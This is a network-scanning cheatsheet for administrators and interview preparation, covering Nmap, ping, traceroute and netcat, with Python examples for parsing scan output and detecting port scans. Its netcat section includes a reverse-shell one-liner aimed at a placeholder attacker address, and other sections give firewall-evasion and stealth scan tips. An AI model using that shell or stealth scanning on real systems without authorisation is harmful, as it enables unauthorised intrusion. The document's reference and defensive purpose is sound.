
Nmap And Network Scanning

Category: Network Tools and Commands
Type: Network Tools & Commands
Generated on: 2025-07-10 09:15:17
For: Network Engineering, Administration & Technical Interviews


This cheatsheet provides a comprehensive guide to using Nmap and other network scanning tools, aimed at network administrators and engineers.

1. Tool Overview

  • Nmap: A powerful and versatile network scanner used for host discovery, port scanning, service enumeration, and OS detection. Essential for network mapping, security auditing, and vulnerability assessment.
  • Ping (ICMP Echo Request): A fundamental tool for verifying network connectivity and basic host reachability. Useful for preliminary network troubleshooting.
  • Traceroute/Tracert: Determines the path packets take to reach a destination, identifying intermediary routers and measuring latency. Helps diagnose network routing issues.
  • Netcat (nc): A versatile networking utility for reading from and writing to network connections using TCP or UDP. Useful for port scanning, data transfer, and simple server/client testing.

When to Use:

  • Nmap: Comprehensive network discovery, port scanning, service version detection, OS fingerprinting, vulnerability assessment, firewall testing.
  • Ping: Quick host reachability check, basic network connectivity verification.
  • Traceroute/Tracert: Identifying network hops, diagnosing routing problems, measuring latency along a path.
  • Netcat: Testing network connectivity, transferring data between hosts, simple server/client communication testing, port scanning.

2. Basic Syntax

Nmap:

    nmap [Scan Type(s)] [Options] {target specification}

Ping:

    ping [Options] {target}

Traceroute (Linux/macOS):

    traceroute [Options] {target}

Tracert (Windows):

    tracert [Options] {target}

Netcat:

    nc [Options] {target} {port}

3. Practical Examples

Nmap:

  • Ping Scan (Host Discovery):

    nmap -sn 192.168.1.0/24
    Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:00 PST
    Nmap scan report for 192.168.1.1 (router.local)
    Host is up (0.0010s latency).
    Nmap scan report for 192.168.1.10 (printer.local)
    Host is up (0.0020s latency).
    Nmap scan report for 192.168.1.20 (desktop.local)
    Host is up (0.0015s latency).
    ...
    Nmap done: 256 IP addresses (10 hosts up) scanned in 5.00 seconds

  • TCP Connect Scan (Full TCP Handshake):

    nmap -sT 192.168.1.20
    Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:01 PST
    Nmap scan report for 192.168.1.20
    Host is up (0.0015s latency).
    Not shown: 998 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds

  • SYN Scan (Stealth Scan):

    nmap -sS 192.168.1.20
    Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:02 PST
    Nmap scan report for 192.168.1.20
    Host is up (0.0012s latency).
    Not shown: 998 closed tcp ports (reset)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

  • UDP Scan:

    nmap -sU 192.168.1.20
    Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:03 PST
    Nmap scan report for 192.168.1.20
    Host is up (0.0018s latency).
    Not shown: 996 closed udp ports (port-unreach)
    PORT    STATE         SERVICE
    53/udp  open|filtered domain
    67/udp  open|filtered dhcps
    123/udp open          ntp
    631/udp open|filtered ipp
    Nmap done: 1 IP address (1 host up) scanned in 5.00 seconds

  • Service Version Detection:

    nmap -sV 192.168.1.20
    Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:04 PST
    Nmap scan report for 192.168.1.20
    Host is up (0.0016s latency).
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Nmap done: 1 IP address (1 host up) scanned in 5.00 seconds

  • OS Detection:

    nmap -O 192.168.1.20
    Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 10:05 PST
    Nmap scan report for 192.168.1.20
    Host is up (0.0014s latency).
    Device type: General purpose
    Running: Linux 4.X
    OS CPE: cpe:/o:linux:linux_kernel:4
    OS details: Linux 4.15 - 5.13
    Network Distance: 1 hop
    OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds

Ping:

  • Basic Ping:

    ping 192.168.1.1
    PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
    64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=0.500 ms
    64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=0.450 ms
    ...
    ^C
    --- 192.168.1.1 ping statistics ---
    2 packets transmitted, 2 received, 0% packet loss, time 1002ms
    rtt min/avg/max/mdev = 0.450/0.475/0.500/0.025 ms

Traceroute/Tracert:

  • Basic Traceroute (Linux/macOS):

    traceroute google.com
    traceroute to google.com (142.250.184.142), 30 hops max, 60 byte packets
     1  192.168.1.1 (192.168.1.1)  1.200 ms  1.000 ms  0.800 ms
     2  10.0.0.1 (10.0.0.1)  5.000 ms  4.800 ms  5.200 ms
     3  ...
    ...

  • Basic Tracert (Windows):

    tracert google.com
    Tracing route to google.com [142.250.184.142]
    over a maximum of 30 hops:

      1    <1 ms    <1 ms    <1 ms  192.168.1.1
      2     5 ms     4 ms     5 ms  10.0.0.1
      3  ...
    ...

Netcat:

  • Port Scanning (TCP):

    nc -v -z 192.168.1.20 20-25
    Connection to 192.168.1.20 22 port [tcp/ssh] succeeded!
    Connection to 192.168.1.20 25 port [tcp/smtp] succeeded!

  • Listening on a Port (Simple Server):

    nc -l -p 12345

  • Connecting to a Port (Simple Client):

    nc 192.168.1.20 12345

4. Common Options

Nmap:

  • -sn: Ping scan - disable port scan
  • -sT: TCP Connect scan
  • -sS: SYN scan (Stealth scan) - requires root privileges
  • -sU: UDP scan
  • -sV: Service version detection
  • -O: OS detection - requires root privileges
  • -p: Specify port(s) to scan (e.g., -p 22,80,443, -p 1-1000)
  • -F: Fast scan (scan fewer ports)
  • -A: Aggressive scan (enable OS detection, version detection, script scanning, and traceroute)
  • -T<0-5>: Timing template (0=paranoid, 1=sneaky, 2=polite, 3=normal, 4=aggressive, 5=insane) - affects scan speed. Higher numbers are faster.
  • -iL <inputfilename>: Scan targets from a file.
  • -oN <outputfilename>: Output to normal text file.
  • -oG <outputfilename>: Output to grepable text file.
  • -oX <outputfilename>: Output to XML file.
  • --script <script_name>: Use Nmap Scripting Engine (NSE) scripts for advanced scanning. Examples: --script banner, --script vuln
  • --traceroute: Perform traceroute after host discovery.

Ping:

  • -c <count>: Number of ping packets to send. (Linux/macOS)
  • -n <count>: Number of ping packets to send. (Windows)
  • -t: Ping continuously until stopped. (Windows)
  • -i <interval>: Interval between pings in seconds. (Linux/macOS)
  • -w <timeout>: Timeout in seconds before exiting, regardless of how many packets have been sent or received. (Linux/macOS)
  • -l <size>: Packet size (Windows)

Traceroute/Tracert:

  • -m <max_hops>: Maximum number of hops to search. (Linux/macOS)
  • -h <max_hops>: Maximum number of hops to search. (Windows)
  • -w <timeout>: Timeout in seconds to wait for a response. (Linux/macOS)
  • -r: Bypass the normal routing tables and send directly to a host on an attached network. (Linux/macOS)
  • -d: Do not resolve addresses to hostnames. (Windows)

Netcat:

  • -l: Listen for incoming connections.
  • -p <port>: Specify the port to listen on or connect to.
  • -v: Verbose output.
  • -z: Zero-I/O mode (used for port scanning).
  • -u: Use UDP instead of TCP.
  • -n: Do not resolve hostnames.
  • -w <seconds>: Timeout for connections.

5. Advanced Usage

Nmap:

  • Scanning a list of hosts from a file:

    nmap -iL hosts.txt -sV -oN scan_results.txt

  • Scanning for specific vulnerabilities using NSE scripts:

    nmap --script vuln 192.168.1.20

  • Combining OS detection and service version detection:

    nmap -O -sV 192.168.1.20

  • Firewall testing (using different scan types to bypass firewall rules):

    nmap -sS -p 80 192.168.1.20 # SYN scan
    nmap -sT -p 80 192.168.1.20 # TCP Connect scan
    nmap -sN -p 80 192.168.1.20 # Null scan
    nmap -sF -p 80 192.168.1.20 # FIN scan
    nmap -sX -p 80 192.168.1.20 # Xmas scan

  • Scanning with custom timing options (adjust for network conditions):

    nmap -T4 --min-rtt-timeout 100ms --max-rtt-timeout 500ms --initial-rtt-timeout 250ms 192.168.1.0/24

  • Using Nmap to identify Heartbleed vulnerability:

    nmap -p 443 --script ssl-heartbleed 192.168.1.20

Netcat:

  • Creating a reverse shell (attacker listens on a port):

    • Target (Linux): nc -l -p 12345 | /bin/bash | nc <attacker_ip> 4444
    • Attacker: nc -l -p 4444
  • File transfer:

    • Sender: nc -l -p 12345 < file.txt
    • Receiver: nc <sender_ip> 12345 > received.txt

6. Troubleshooting Scenarios

  • Host unreachable (Ping fails):
    • Problem: Host may be down, network connectivity issues, firewall blocking ICMP.
    • Solution: Verify physical connection, check IP address, examine routing tables, investigate firewall rules. Try pinging the gateway to see if the local network is the issue.
  • Port scan shows all ports filtered:
    • Problem: Firewall is blocking all ports, host is down, Nmap is not running with sufficient privileges (for SYN scan).
    • Solution: Verify host is up, check firewall rules, run Nmap with root privileges (if using SYN scan). Try a TCP Connect scan (-sT) as it doesn’t require root.
  • Traceroute shows asterisks (*) for hops:
    • Problem: Router not responding to traceroute requests, firewall blocking ICMP Time Exceeded messages.
    • Solution: This is often normal, especially on the public internet. Try using TCP traceroute (traceroute -T) on Linux. On Windows, there isn’t a built-in TCP traceroute; you can use tools like tcptraceroute.
  • Service version detection is inaccurate:
    • Problem: Service version is intentionally obfuscated, Nmap’s database is outdated, service is running on a non-standard port.
    • Solution: Upgrade Nmap so that its service-probe database (nmap-service-probes) is current (nmap --script-updatedb only rebuilds the NSE script index, not the service probes), manually investigate the service, and run service detection on all ports (-sV -p-) in case it sits on a non-standard port.
  • Slow scan speeds:
    • Problem: Network latency, aggressive firewall rules, Nmap timing options set too conservatively.
    • Solution: Adjust Nmap timing options (-T3 or higher), increase RTT timeouts, reduce the number of ports scanned.

7. Output Interpretation

Nmap:

  • Host is up/down: Indicates whether the host is reachable.
  • Open: The port is listening for connections.
  • Closed: The port is accessible, but no application is listening.
  • Filtered: Nmap cannot determine if the port is open or closed due to firewall interference.
  • Unfiltered: The port is accessible, but Nmap cannot determine whether it is open or closed (reported only by ACK scans, which are used to map firewall rules rather than find listeners).
  • Open|Filtered: Nmap believes the port is open or filtered, but cannot determine definitively.
  • Closed|Filtered: Nmap believes the port is closed or filtered, but cannot determine definitively.
  • Service Version: The version of the application running on the port (e.g., “OpenSSH 8.2p1 Ubuntu 4ubuntu0.7”).
  • OS Details: The detected operating system of the target host.
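The states above decide which ports matter in an exposure review, and the -oX format from section 4 is the one to feed into tooling. As an added example (not part of this cheatsheet and not Nmap's own code), the Python below parses a constructed -oX document, keeps only hosts reported up, and lists every open or open|filtered port that is missing from an expected-exposure baseline, as well as baseline ports the scan no longer sees. The sample XML, the baseline and the EXPOSED_STATES choice are assumptions made for the example.

```python
"""Parse Nmap XML output (-oX) and diff it against an expected-exposure baseline.
Added example; the XML below is constructed to mirror the scans on this page
and is not real scan output."""
import xml.etree.ElementTree as ET

# Constructed sample: trimmed to what `nmap -sS -sU -sV -oX scan.xml 192.168.1.20`
# would emit for the elements used here.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" version="7.94">
  <host>
    <status state="up"/>
    <address addr="192.168.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.41"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="filtered" reason="no-response"/>
        <service name="telnet"/>
      </port>
      <port protocol="udp" portid="53">
        <state state="open|filtered" reason="no-response"/>
        <service name="domain"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.1.21" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# States that can hide a listener and therefore count as exposure.
# "filtered" alone says nothing about a listener, so it is excluded (assumption).
EXPOSED_STATES = {"open", "open|filtered"}


def parse_nmap_xml(xml_text):
    """Return {ip: {"port/proto": (state, service_name)}} for hosts that are up."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # down hosts carry no port data worth keeping
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ports = {}
        for port in host.iter("port"):
            key = f"{port.get('portid')}/{port.get('protocol')}"
            state_el = port.find("state")
            state = state_el.get("state") if state_el is not None else "unknown"
            svc = port.find("service")
            ports[key] = (state, svc.get("name") if svc is not None else "")
        hosts[addr.get("addr")] = ports
    return hosts


def baseline_diff(scan, baseline):
    """Compare a parsed scan with an expected-exposure baseline.

    baseline maps ip -> set of "port/proto" entries that are supposed to be
    reachable.  Returns (unexpected, missing): exposed ports absent from the
    baseline, and baseline ports the scan did not find exposed."""
    unexpected, missing = [], []
    for ip, ports in scan.items():
        expected = baseline.get(ip, set())
        exposed = {p for p, (state, _) in ports.items() if state in EXPOSED_STATES}
        unexpected += sorted((ip, p) for p in exposed - expected)
        missing += sorted((ip, p) for p in expected - exposed)
    return unexpected, missing


if __name__ == "__main__":
    scan = parse_nmap_xml(SAMPLE_XML)
    # Constructed baseline: only SSH and HTTP are meant to be reachable.
    unexpected, missing = baseline_diff(scan, {"192.168.1.20": {"22/tcp", "80/tcp"}})
    for ip, p in unexpected:
        print(f"UNEXPECTED {ip} {p} ({scan[ip][p][0]}, {scan[ip][p][1]})")
    for ip, p in missing:
        print(f"MISSING    {ip} {p}")
```

Run against a real file with parse_nmap_xml(open("scan.xml").read()); with the sample, 53/udp is reported as unexpected because open|filtered is treated as possible exposure, while the filtered telnet port is ignored.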

Ping:

  • Time: Round-trip time (RTT) in milliseconds. Lower is better.
  • TTL: Time To Live. Decremented by each router, so the received value hints at both the sender's OS and its distance: common initial values are 64 (Linux/Unix/macOS), 128 (Windows) and 255 (many network devices).
  • Packet Loss: Percentage of packets lost during the ping test.
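As an added example rather than part of this cheatsheet, the following Python reproduces the statistics line of the ping example in section 3 (min/avg/max/mdev, where mdev is the population standard deviation that iputils ping reports) and turns an observed TTL into an initial-TTL guess and a hop distance. The sample output and the table of initial TTLs are constructed for the example.

```python
"""Parse Linux ping output, recompute its statistics line, and derive a
TTL-based hop-distance / OS-family hint.  Added example; the sample output is
constructed to match the ping example on this page."""
import math
import re

# Constructed sample, identical to the section 3 ping output.
SAMPLE_PING = """PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=0.500 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=0.450 ms
"""

REPLY_RE = re.compile(r"icmp_seq=(\d+) ttl=(\d+) time=([\d.]+) ms")

# Common initial TTLs (assumed table): 64 Linux/Unix/macOS, 128 Windows,
# 255 many network devices and Solaris.  Ordered ascending for the lookup.
INITIAL_TTLS = ((64, "Linux/Unix"), (128, "Windows"), (255, "network device/Solaris"))


def parse_replies(text):
    """Return a list of (seq, ttl, rtt_ms) tuples, one per echo reply line."""
    return [(int(s), int(t), float(r)) for s, t, r in REPLY_RE.findall(text)]


def rtt_stats(rtts):
    """min/avg/max/mdev as iputils ping prints them.

    mdev is the population standard deviation (sqrt of mean squared deviation),
    which is what ping computes from its running sums."""
    n = len(rtts)
    avg = sum(rtts) / n
    mdev = math.sqrt(sum((r - avg) ** 2 for r in rtts) / n)
    return tuple(round(v, 3) for v in (min(rtts), avg, max(rtts), mdev))


def packet_loss(sent, replies):
    """Loss percentage given the number of requests sent and the parsed replies."""
    return round(100.0 * (sent - len(replies)) / sent, 1)


def ttl_hint(observed_ttl):
    """Guess (initial_ttl, hops, os_family) from a received TTL: pick the
    smallest common initial TTL not below the observed value; the difference
    is the number of routers the reply crossed."""
    for initial, family in INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial, initial - observed_ttl, family
    return None, None, "unknown"


if __name__ == "__main__":
    replies = parse_replies(SAMPLE_PING)
    lo, avg, hi, mdev = rtt_stats([r[2] for r in replies])
    print(f"{len(replies)} received, {packet_loss(2, replies)}% packet loss")
    print(f"rtt min/avg/max/mdev = {lo:.3f}/{avg:.3f}/{hi:.3f}/{mdev:.3f} ms")
    print("ttl hint:", ttl_hint(replies[0][1]))
```

The hint is only a heuristic: a host with a tuned initial TTL, or a reply answered by a middlebox, will mislead it, which is why Nmap's -O relies on many more fingerprint features than TTL alone.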

Traceroute/Tracert:

  • Hop Number: The sequence number of each router along the path.
  • Hostname/IP Address: The hostname (if resolvable) and IP address of each router.
  • Latency: The round-trip time (RTT) to each router.
  • *: Indicates a timeout or that the router did not respond to the traceroute request.

Netcat:

  • Output depends on the specific usage. For port scanning, “Connection to…succeeded!” indicates an open port.

8. Security Considerations

  • Legality: Scanning networks without permission is illegal in many jurisdictions. Always obtain explicit permission before scanning any network you do not own or administer.
  • Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS): Aggressive scanning can trigger alerts and potentially be blocked by security systems.
  • Resource Consumption: Scanning large networks can consume significant bandwidth and processing power, potentially impacting network performance.
  • Stealth: Use stealth scan techniques (e.g., SYN scan, fragmented packets) to minimize the risk of detection, but be aware that these techniques may still be logged.
  • Denial-of-Service (DoS): Avoid sending excessive traffic or using techniques that could overwhelm the target system.
  • Data Privacy: Be mindful of sensitive information that may be exposed during scanning (e.g., usernames, passwords).
  • Nmap Scripting Engine (NSE): Exercise caution when using NSE scripts, as some scripts may be outdated, malicious, or produce unintended consequences. Review the script’s source code before execution.
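The detection side of the IDS/IPS point: an added Python example (not part of this cheatsheet) that reads constructed iptables-style drop log lines and flags a source that touched many distinct destination ports on one host within a short window, which is the trace a port scan leaves in firewall logs. The FW-DROP log prefix, the field layout, the 60-second window and the five-port threshold are assumptions for the example.

```python
"""Flag port-scan behaviour in firewall drop logs: one source hitting many
distinct destination ports on one host inside a short window.  Added example;
the log lines are constructed in iptables LOG style and are not real data."""
import re
from collections import defaultdict

# Constructed sample (assumed LOG prefix "FW-DROP"; fields trimmed to those used).
# 203.0.113.5 is a documentation-range address standing in for an external scanner.
SAMPLE_LOG = """\
Jan  1 10:02:00 gw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.5 DST=192.168.1.20 PROTO=TCP SPT=40001 DPT=21 SYN
Jan  1 10:02:00 gw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.5 DST=192.168.1.20 PROTO=TCP SPT=40002 DPT=22 SYN
Jan  1 10:02:00 gw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.5 DST=192.168.1.20 PROTO=TCP SPT=40003 DPT=23 SYN
Jan  1 10:02:01 gw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.5 DST=192.168.1.20 PROTO=TCP SPT=40004 DPT=25 SYN
Jan  1 10:02:01 gw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.5 DST=192.168.1.20 PROTO=TCP SPT=40005 DPT=25 SYN
Jan  1 10:02:01 gw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.5 DST=192.168.1.20 PROTO=TCP SPT=40006 DPT=80 SYN
Jan  1 10:02:02 gw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.5 DST=192.168.1.20 PROTO=TCP SPT=40007 DPT=443 SYN
Jan  1 10:02:05 gw kernel: FW-DROP IN=eth0 OUT= SRC=192.168.1.30 DST=192.168.1.20 PROTO=TCP SPT=51000 DPT=3389 SYN
Jan  1 10:02:09 gw kernel: FW-DROP IN=eth0 OUT= SRC=192.168.1.30 DST=192.168.1.20 PROTO=TCP SPT=51001 DPT=3389 SYN
Jan  1 10:30:00 gw kernel: FW-DROP IN=eth0 OUT= SRC=203.0.113.5 DST=192.168.1.20 PROTO=TCP SPT=40008 DPT=8080 SYN
"""

# Syslog timestamp, then the SRC/DST/PROTO/DPT fields in the order iptables emits them.
LINE_RE = re.compile(
    r"^\w{3}\s+\d+ (\d\d):(\d\d):(\d\d) \S+ kernel: FW-DROP .*?"
    r"SRC=(\S+) DST=(\S+) .*?PROTO=(\S+) .*?DPT=(\d+)"
)


def parse_drops(text):
    """Return (seconds_since_midnight, src, dst, proto, dport) per matching line.
    Assumes all lines fall on one day; a real pipeline would keep the date."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        h, mi, s, src, dst, proto, dpt = m.groups()
        events.append((int(h) * 3600 + int(mi) * 60 + int(s), src, dst, proto, int(dpt)))
    return events


def find_scanners(events, window=60, min_ports=5):
    """Return {(src, dst): peak_distinct_ports} for pairs where at least
    min_ports distinct (proto, port) targets were hit within any window-second span."""
    by_pair = defaultdict(list)
    for t, src, dst, proto, dpt in events:
        by_pair[(src, dst)].append((t, proto, dpt))
    hits = {}
    for pair, evs in by_pair.items():
        evs.sort()
        best, lo = 0, 0
        for hi in range(len(evs)):
            # Slide the window start forward until it fits inside `window` seconds.
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            distinct = len({(p, d) for _, p, d in evs[lo:hi + 1]})
            best = max(best, distinct)
        if best >= min_ports:
            hits[pair] = best
    return hits


if __name__ == "__main__":
    for (src, dst), n in find_scanners(parse_drops(SAMPLE_LOG)).items():
        print(f"possible port scan: {src} -> {dst}, {n} distinct ports within 60s")
```

Repeated hits on one port (the 3389 lines) never trip the rule, and the 8080 probe half an hour later is outside the window, so the only alert is the six-port burst from 203.0.113.5. Tune the window and threshold to the network; a -T0 scan spreads probes far enough apart that a short window will miss it, which is the trade-off the Stealth bullet above describes from the other side.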

9. Platform Differences

  • Root Privileges: SYN scan (-sS) and OS detection (-O) typically require root privileges on Linux/macOS. On Windows, Nmap may require administrative privileges.
  • Command Syntax: Some command options may vary slightly between Linux/macOS and Windows (e.g., ping options).
  • Path to Executables: The location of Nmap, ping, traceroute, and netcat executables may differ depending on the operating system and installation method.
  • Firewall Configuration: Firewall rules and configurations vary significantly between operating systems. Adjust firewall settings as needed to allow or block scanning traffic.
  • Netcat Availability: Netcat is not always installed by default on all operating systems. Install it using your distribution’s package manager (e.g., apt install netcat-openbsd or netcat-traditional on Debian/Ubuntu, brew install netcat on macOS with Homebrew, or download it for Windows). ncat (part of the Nmap suite) is a more modern and feature-rich alternative.

This cheatsheet is a starting point. Refer to the official documentation for each tool for complete details and advanced options. Always prioritize ethical and legal considerations when performing network scanning activities.